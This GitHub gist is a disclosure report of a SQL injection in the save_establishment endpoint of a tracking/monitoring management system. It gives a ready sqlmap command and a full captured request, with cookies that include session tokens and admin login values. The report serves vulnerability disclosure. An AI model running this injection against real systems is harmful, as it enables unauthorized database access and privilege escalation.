Skip to content

Instantly share code, notes, and snippets.

Show Gist options
  • Save topsky979/f01eca07fce854bf5de96588126cdd7e to your computer and use it in GitHub Desktop.
Save topsky979/f01eca07fce854bf5de96588126cdd7e to your computer and use it in GitHub Desktop.

[description]

Tracking/Monitoring Management System was discovered to contain a SQL Injection vulnerability via the URI /ajax.php?action=save_establishment


[Vulnerability Type]

SQL Injection


[Vendor of Product]

[Affected Product Code Base]

1.0


[Impact Escalation of Privileges]

true


[POC]
sqlmap commands:

sqlmap -r a.txt -p id --batch --banner --flush-session

a.txt

POST /ajax.php?action=save_establishment HTTP/1.1
Host: 192.168.0.183:11180
Content-Length: 341
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySzqY8ghe6K6seAfB
Origin: http://192.168.0.183:11180
Referer: http://192.168.0.183:11180/index.php?page=establishment
Accept-Encoding: gzip, deflate, br
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8,en-US;q=0.7
Cookie: i18next=en; Admin-Token=eyJhbGciOiJIUzUxMiJ9.eyJsb2dpbl91c2VyX2tleSI6ImU0ZjJhZWJmLWVkMDEtNGM0OC04YjU4LTI3OTFjMzllMzFmMCJ9.0J-cqM7f9-cNNDe8_Q3CAiWkq4iyNqLDbBUh6mnYfRl1Ygv4HPIp3Ky1cbbpN3_4Zr8lYluJ5-nEunFvF84Xyw; sidebarStatus=0; pro_end=-1; ltd_end=-1; serverType=nginx; order=id%20desc; memSize=32012; sites_path=/www/wwwroot; distribution=ubuntu; force=0; uploadSize=1073741824; rank=a; form_proxy=%5Bobject%20Object%5D; backup_path=/www/backup; _ga=GA1.1.2111016145.1721287966; _ga_J1DQF09WZC=GS1.1.1721287966.1.1.1721292532.0.0.0; weberp_installation=li98qb9dmcjbkupdsthditlpb3; files_sort=name; showRow=2000; Module=AP; PHPSESSIDwebERPteam=hnbgetkfg5o9mdts1ul0tt7a92; name_reverse=True; copyFileName=null; is_admin=false; username=admin; userpwd=admin123456; ispwd=1; BatchPaste=2; pnull=1; p-1=nullnot_load; softType=0; load_type=0; p0=1; load_page=1; load_search=apache; PHPSESSID=git91lpt9et0atu8q4dg73890i; SESSIONID=84fddaa1-6f23-4ebf-b2d5-d69ffb8f4ca3.si0YTPb5ZULv7CJZ8PxxFgocWgs; request_token=ro0mHsPqA65198aPlmVMBVmI2GD6ltWERhyREaJpOKy9NuaC; cutFileName=null; layers=3; BatchSelected=null; Path=/www/wwwroot/111.com; vcodesum=6
Connection: keep-alive

------WebKitFormBoundarySzqY8ghe6K6seAfB
Content-Disposition: form-data; name="id"

1
------WebKitFormBoundarySzqY8ghe6K6seAfB
Content-Disposition: form-data; name="name"

Sample Mall
------WebKitFormBoundarySzqY8ghe6K6seAfB
Content-Disposition: form-data; name="address"

Sample Only
------WebKitFormBoundarySzqY8ghe6K6seAfB--

图片
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment